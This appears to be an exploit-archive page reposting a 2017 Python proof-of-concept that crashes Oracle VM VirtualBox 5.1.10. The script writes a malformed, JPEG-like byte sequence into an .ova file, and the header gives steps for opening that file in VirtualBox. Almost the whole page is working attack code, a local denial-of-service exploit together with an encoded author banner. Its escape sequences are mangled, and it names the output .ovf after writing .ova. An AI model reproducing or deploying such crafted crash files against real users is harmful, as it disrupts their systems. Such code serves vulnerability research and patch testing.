Home / os / winmobile

Oracle VM VirtualBox 5.1.10 Denial Of Service

Posted on 18 February 2017

#Exploit Title: Oracle VM VirtualBox 5.1.10 local Export MODE -Crash (PoC)
#Author: sultan albalawi
#Tested on:win7
#Oracle VM VirtualBox 5.1.10 - Export MODE 'Crash (PoC) .ova /.ovf
#open VirtualBox
#Guided MODE
#Choose CRASH FILE
#NEXT*3 OR OPEN FILE WITH VirtualBox
ban= 'x0dx0ax20x20x20x20x20x20x20x5cx20x20x20x2dx20x20'
ban+='x2dx20x20x2dx20x3cx73x65x72x76x65x72x3ex20x20x2d'
ban+='x20x5cx2dx2dx2dx3cx20x2dx20x2dx20x20x2dx20x2dx20'
ban+='x20x2dx20x20x2ax0dx0ax20x20x20x20x20x20x20x20x20'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20'
ban+='x20x20x20x20x20x20x20x20x2ax2ax2ax0dx0ax20x20x20'
ban+='x20x20x20x20x7cx20x20x20x20x44x6fx63x5fx41x74x74'
ban+='x61x63x6bx20x20x20x20x20x20x20x20x20x20x20x20x20'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x2ax2ax2a'
ban+='x2ax2ax0dx0ax20x20x20x20x20x20x20x7cx20x20x20x20'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20'
ban+='x20x20x20x2ax2ax2ax2ax2ax2ax2ax0dx0ax20x20x20x20'
ban+='x20x20x20x76x20x20x20x20x20x20x20x20x60x20x60x2e'
ban+='x20x20x20x20x2cx3bx27x20x20x20x20x20x20x20x20x20'
ban+='x20x20x20x20x20x20x20x20x20x2ax2ax2ax2ax41x70x50'
ban+='x2ax2ax2ax2ax0dx0ax20x20x20x20x20x20x20x20x20x20'
ban+='x20x20x20x20x20x20x60x2ex20x20x2cx27x2fx20x2ex27'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20'
ban+='x20x20x2ax2ax2ax2ax2ax2ax2ax2ax2ax2ax2ax2ax2ax0d'
ban+='x0ax20x20x20x20x20x20x20x20x20x20x20x20x20x20x20'
ban+='x20x20x60x2ex20x58x20x2fx2ex27x20x20x20x20x20x20'
ban+='x20x20x20x20x20x20x20x2ax20x20x20x20x20x2ax2ax2a'
ban+='x2ax2ax2ax2ax2ax2ax2ax2ax2ax2ax0dx0ax20x20x20x20'
ban+='x20x20x20x2ex2dx3bx2dx2dx27x27x2dx2dx2ex5fx60x20'
ban+='x60x20x28x20x20x20x20x20x20x20x20x20x20x20x20x20'
ban+='x20x2ax2ax2ax20x20x20x20x20x20x20x20x20x20x7cx0d'
ban+='x0ax20x20x20x20x20x2ex27x20x20x20x20x20x20x20x20'
ban+='x20x20x20x2fx20x20x20x20x27x20x20x20x20x20x20x20'
ban+='x20x20x20x20x20x2ax2ax2ax2ax2ax20x20x20x20x20x20'
ban+='x20x20x20x7cx20x64x61x74x61x62x61x73x65x0dx0ax20'
ban+='x20x20x20x20x3bx53x65x63x75x72x69x74x79x60x20x20'
ban+='x27x20x30x20x20x30x20x27x20x20x20x20x20x20x20x20'
ban+='x20x2ax2ax2ax4ex45x54x2ax2ax2ax20x20x20x20x20x20'
ban+='x20x7cx0dx0ax20x20x20x20x2cx20x20x20x20x20x20x20'
ban+='x2cx20x20x20x20x27x20x20x7cx20x20x27x20x20x20x20'
ban+='x20x20x20x20x20x20x2ax2ax2ax2ax2ax2ax2ax2ax2ax20'
ban+='x20x20x20x20x20x20x5ex0dx0ax20x2cx2ex20x7cx20x20'
ban+='x20x20x20x20x20x27x20x20x20x20x20x60x2ex5fx2ex27'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x7c'
ban+='x2dx2dx2dx2dx2dx2dx2dx5ex2dx2dx2dx5ex20x20x20x20'
ban+='x20x20x20x20x20x20x2fx0dx0ax20x3ax20x20x2ex20x60'
ban+='x20x20x3bx20x20x20x60x20x20x60x20x2dx2dx2cx2ex2e'
ban+='x5fx3bx2dx2dx2dx3ex20x20x20x20x20x20x20x20x20x7c'
ban+='x20x20x20x20x20x20x20x27x2ex27x2ex27x5fx5fx5fx5f'
ban+='x5fx5fx5fx5fx20x2ax0dx0ax20x20x27x20x60x20x20x20'
ban+='x20x2cx20x20x20x29x20x20x20x2ex27x20x20x20x20x20'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x5ex20'
ban+='x20x20x20x20x20x20x20x7cx5fx7cx20x46x69x72x65x77'
ban+='x61x6cx6cx20x29x0dx0ax20x20x20x20x20x60x2ex5fx20'
ban+='x2cx20x20x27x20x20x20x2fx5fx20x20x20x20x20x20x20'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x7cx20x20'
ban+='x20x20x20x20x20x20x20x20x20x20x7cx7cx20x20x20x20'
ban+='x7cx7cx0dx0ax20x20x20x20x20x20x20x20x3bx20x2cx27'
ban+='x27x2dx2cx3bx27x20x60x60x2dx5fx5fx5fx5fx5fx5fx5f'
ban+='x5fx5fx5fx5fx5fx5fx5fx5fx5fx5fx7cx0dx0ax20x20x20'
ban+='x20x20x20x20x20x20x60x60x2dx2ex2ex5fx5fx60x60x2d'
ban+='x2dx60x20x20x20x20x20x20x20x69x70x73x20x20x20x20'
ban+='x20x20x20x2dx20x20x20x20x20x20x20x20x20x20x20x5e'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x2fx0dx0ax20'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20'
ban+='x20x20x20x20x20x20x2dx20x20x20x20x20x20x20x20x27'
ban+='x2ex20x5fx2dx2dx2dx2dx2dx2dx2dx2dx2dx2ax0dx0ax20'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20'
ban+='x20x20x20x20x20x20x20x2dx5fx5fx5fx5fx5fx5fx5fx20'
ban+='x7cx5fx20x20x49x50x53x20x20x20x20x20x29x0dx0ax20'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20'
ban+='x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20x20'
ban+='x20x20x20x20x7cx7cx20x20x20x20x20x7cx7cx0dx0ax20'
ban+='
'
ban+='x53x75x6cx74x61x6ex5fx41x6cx62x61x6cx61x77x69
'
ban+='x68x74x74x70x73x3ax2fx2fx77x77x77x2ex66x61x63x65x62x6fx6fx6bx2ex63x6fx6dx2fx70x65x6ex74x65x73x74x33
'
ban+="x61x6cx62x61x6cx61x77x69x34x70x65x6ex74x65x73x74x40x67x6dx61x69x6cx2ex63x6fx6d"
print ban
test = [
0xFF, 0xD8, 0xFF, 0xE0, 0x00, 0x10, 0x4A, 0x46, 0x49, 0x46, 0x00, 0x01, 0x02,
0x00, 0x00, 0x64, 0x00, 0x64, 0x00, 0x00, 0xFF, 0xEC, 0x00, 0x11, 0x44, 0x75,
0x63, 0x6B, 0x79, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00,
0xFF, 0xEf, 0x00, 0x0E, 0x41, 0x64, 0x6F, 0x62, 0x65, 0x00, 0x64, 0xC0, 0x00,
0x00, 0x00, 0x01, 0xFF, 0xDB, 0x00, 0x84, 0x00, 0x14, 0x10, 0x10, 0x19, 0x12,
0x19, 0x27, 0x17, 0x17, 0x27, 0x32, 0x26, 0x1F, 0x26, 0x32, 0x2E, 0x26, 0x26,
0x26, 0x26, 0x2E, 0x3E, 0x35, 0x35, 0x35, 0x35, 0x35, 0x3E, 0x44, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44,
0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44,
0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x01, 0x15, 0x19, 0x19, 0x20, 0x1C,
0x20, 0x26, 0x18, 0x18, 0x26, 0x36, 0x26, 0x20, 0x26, 0x36, 0x44, 0x36, 0x2B,
0x2B, 0x36, 0x44, 0x44, 0x44, 0x42, 0x35, 0x42, 0x44, 0x44, 0x44, 0x44, 0x44,
0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44,
0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44,
0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0xFF, 0xC0, 0x00, 0x11, 0x08, 0x00,
0x01, 0x00, 0x01, 0x03, 0x01, 0x22, 0x00, 0x02, 0x11, 0x01, 0x03, 0x11, 0x01,
0xFF, 0xC4, 0x00, 0x4B, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x01, 0x01, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x10, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x01, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF,
0xDA, 0x00, 0x0C, 0x03, 0x01, 0x00, 0x02, 0x11, 0x03, 0x11, 0x00, 0x3F, 0x00,
0xFF, 0xD8, 0xFF, 0xE0, 0x00, 0x10, 0x4A, 0x46, 0x49, 0x46, 0x00, 0x01, 0x02,
0x00, 0x00, 0x64, 0x00, 0x64, 0x00, 0x00, 0xFF, 0xEC, 0x00, 0x11, 0x44, 0x75,
0x63, 0x6B, 0x79, 0x00, 0x01, 0x00, 0x04, 0x00, 0x00, 0x00, 0x0A, 0x00, 0x00,
0xFF, 0xEf, 0x00, 0x0E, 0x41, 0x64, 0x6F, 0x62, 0x65, 0x00, 0x64, 0xC0, 0x00,
0x00, 0x00, 0x01, 0xFF, 0xDB, 0x00, 0x84, 0x00, 0x14, 0x10, 0x10, 0x19, 0x12,
0x19, 0x27, 0x17, 0x17, 0x27, 0x32, 0x26, 0x1F, 0x26, 0x32, 0x2E, 0x26, 0x26,
0x26, 0x26, 0x2E, 0x3E, 0x35, 0x35, 0x35, 0x35, 0x35, 0x3E, 0x44, 0x41, 0x41,
0x41, 0x41, 0x41, 0x41, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44,
0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44,
0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x01, 0x15, 0x19, 0x19, 0x20, 0x1C,
0x20, 0x26, 0x18, 0x18, 0x26, 0x36, 0x26, 0x20, 0x26, 0x36, 0x44, 0x36, 0x2B,
0x2B, 0x36, 0x44, 0x44, 0x44, 0x42, 0x35, 0x42, 0x44, 0x44, 0x44, 0x44, 0x44,
0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44,
0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44,
0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0x44, 0xFF, 0xC0, 0x00, 0x11, 0x08, 0x00,
0x01, 0x00, 0x01, 0x03, 0x01, 0x22, 0x00, 0x02, 0x11, 0x01, 0x03, 0x11, 0x01,
0xFF, 0xC4, 0x00, 0x4B, 0x00, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x06, 0x01, 0x01, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x10, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x01, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xFF,
0xDA, 0x00, 0x0C, 0x03, 0x01, 0x00, 0x02, 0x11, 0x03, 0x11, 0x00, 0x3F, 0x00,
0xB3, 0x00, 0x1F, 0xFF, 0xD9 ,0xDA, 0x00, 0x0C, 0x03, 0x01, 0x00, 0x11, 0x01 ]

f = open(__file__+".ova", "wb")
for test1 in test: f.write("%c" % test1)
f.close()
print '[*]'+__file__+".ovf created (%d bytes)" % len(test)

 

TOP

Malware :

Exploits :